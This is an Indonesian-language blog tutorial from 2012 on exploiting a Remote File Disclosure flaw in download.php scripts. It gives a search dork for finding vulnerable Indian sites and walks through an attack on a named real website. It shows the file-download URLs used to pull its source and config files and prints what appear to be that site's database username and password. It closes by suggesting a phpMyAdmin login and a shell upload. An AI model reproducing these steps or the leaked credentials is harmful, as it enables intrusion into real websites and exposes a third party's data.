Friday, February 24, 2012

Tutorial Hacking Website dengan metode RFD(Remote File Disclosure)

Tutorial Hacking Website dengan metode RFD (Remote File Disclosure) berguna untuk mencari File Config atau semua yang berhubungan dengan Datababase, jadi kumpulin config sebanyak-banyaknya ya,. jangan lupa bagi-bagi :*
Untuk Dorknya :
"inurl:download.php?file=" site:in ---> Khusus buat site india, bisa di sesuaikan
Target kali ini >> http://kiteodisha.co.in/
langkah pertama yang kita lakukan harus mencari Link Downloadnya,
  
Ini dia link Tempat Downloadnya>> http://kiteodisha.co.in/download.php?file=..blablabla
coba kita ubah menjadi>>  http://kiteodisha.co.in/download.php?file=index.php
Berguna untuk mendownload index.php asli website tersebut :)
Nahhh.. itu kan berhasil, sekarang kita coba Open with Notepad aja =))
apaan sih isinya =))
Ternyata ada file Confignya =)) asyiikkkk.. =))
sekarang coba kita akses dengan kode url >> http://kiteodisha.co.in/download.php?file=dbcon.php

Jngan lupa open with Notepad =))
dan lihat apa yang kita dapatkan =))
Next kita telah berhasil mendapatkan file confignya :)
$con=mysql_connect("localhost","kiteodis_kites","kites123");
$db=mysql_select_db("kiteodis_kites",$con);

Setelah itu terserah ama om-om itu file mau di apain, bisa aja login ke halaman phpmyadmin nya,
sekian dari saya, buat yang master di lewat.. dan untuk upload shell dari phpmyadmin next poting yah =)) kwkwkwkwk.. Enjoy >>
Greets >> Medan Cayber Team

Terkait

Description: Tutorial Hacking Website dengan metode RFD(Remote File Disclosure) Rating: 4.5 Reviewer: Setan dari surga ItemReviewed: Tutorial Hacking Website dengan metode RFD(Remote File Disclosure)
Al
Mbah Qopet Updated at: 2/24/2012 01:03:00 AM

0 komentar:

Post a Comment